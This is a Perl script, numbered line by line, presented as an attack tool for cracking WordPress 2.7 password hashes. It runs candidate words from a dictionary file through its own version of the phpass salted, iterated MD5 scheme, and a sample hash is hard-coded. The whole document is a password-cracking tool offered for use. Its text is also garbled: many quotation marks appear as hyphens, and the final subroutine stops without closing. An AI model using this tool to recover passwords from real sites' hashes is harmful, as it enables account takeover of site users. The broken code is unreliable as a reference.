Wordpress Password Hash.txt

1. #################################################################
2. #Wordpress 2.7 PasswordHash Attack Tool
3. #It is based in "Portable PHP password hashing framework"
4. #for Wordpress 2.7
5. #Autor: julioisaias
6. #Thanks to Waraxe and m1cr0n
7. #Contact: julioisaias[at]gmail.com
8. #ALTO PARANA - PARAGUAY
9. #################################################################
10.  
11. #! /usr/bin/perl -w
12. use strict;
13. use Digest::MD5 qw(md5 md5_hex);
14. use List::Util qw(min);
15.  
16. my $hashP = -$P$BS5/b7lxp4t.0j1ZFTyRcdrvAyxh5R0'; # 12345
17. my $dictionary = 'mydic.txt'; # Put a dictionary
18. my $php_version = '5'; # Don't modify if you don't know it
19.  
20. open (f1, -<$dictionary") || die "Error in open file!.\n";
21.    $hashP =~ m{^(\$P\$[/a-zA-Z0-9.]+)};
22.    die "Bad hash!\n" if length($1) != 34;
23.    my ($itoa64) = join(--, my @itoa64 =
24. (-.-,-/-,'0'..'9','A'..'Z','a'..'z'));
25.    my ($salt, $hash)=$hashP=~m/^(.{0,12})(.+)/;
26.    my ($header)=$salt=~m/^(.{0,3})/;
27.    while (<f1>) {
28.    chomp($_);
29.    print "Current Password: $_\r";
30.    my $found = &finder($_,$salt,$hash);
31.    print -\nPassword FOUND: $_" and last if $found;
32.    print -\nPassword NOT FOUND:- if eof;
33.    }
34. close f1;
35.  
36. sub b64{
37.    my $input = $_[0];
38.    my @input = split(//,$input);
39.    my $count = $_[1];
40.    my $output = --;
41.    my $i;
42.    do {
43.    my $value = ord($input[$i++]);
44.    $output .= $itoa64[$value & 0x3f];
45.    if ($i < $count){
46.        $value |= ord($input[$i]) << 8;
47.    }
48.    $output .= $itoa64[($value >> 6) & 0x3f];
49.    if ($i++ >= $count){
50.        return $output;
51.    }
52.    if ($i < $count){
53.        $value |= ord($input[$i]) << 16;
54.    }
55.    $output .= $itoa64[($value >> 12) & 0x3f];
56.    return $output if $i++ >= $count;
57.    $output .= $itoa64[($value >> 18) & 0x3f];
58.    } while ($i < $count);
59.    return $output;
60. }
61.  
62. sub EncryptP{
63.    my $password = $_[0];
64.    my $setting = $_[1];
65.    my @setting = split(//,$setting);
66.    my $hash;
67.    my $output = -*0';
68.     $output = -*1' if substr($setting, 0, 2) eq $output;
69.    return $output if substr($setting, 0, 3) ne $header;
70.    my $count_log2 = index($itoa64, $setting[3]);
71.    if ($count_log2 < 7 || $count_log2 > 30){
72.    return $output;}
73.    my $count = 1 << $count_log2;
74.    my $salt = substr($setting, 4, 8);
75.    return $output if length($salt) != 8;
76.    if ($php_version >= '5') {
77.    $hash = md5($salt . $password);
78.    do {
79.        $hash = md5($hash . $password);
80.    } while (--$count);
81.  
82.    } else {
83.    $hash = pack('H*-, md5_hex($salt . $password));
84.     do {
85.         $hash = pack('H*-, md5_hex($hash . $password));
86.        } while (--$count);
87.    }
88.    $output = substr($setting, 0, 12);
89.    $output .= &b64($hash, 16);
90.    return $output;
91. }
92.  
93. sub HashP{
94.    my $password = $_[0];
95.    my $salt = $_[1];
96.    my $hash;
97.    $hash = &EncryptP($password,$salt);
98.    return $hash if length($hash) == 34;
99. }
100.  
101. sub CheckP{
102.    my $password = $_[0];
103.    my $stored_hash = $_[1];
104.    my $hash = &EncryptP($password,$stored_hash);
105.    return $hash;
106. }
107.  
108. sub finder{
109.    my $password = $_[0];
110.    my $salt = $_[1];
111.    my $hash = $_[2];
112.    my $output = &CheckP($password,&HashP($password,$salt));
113.    return $output eq $salt.$hash;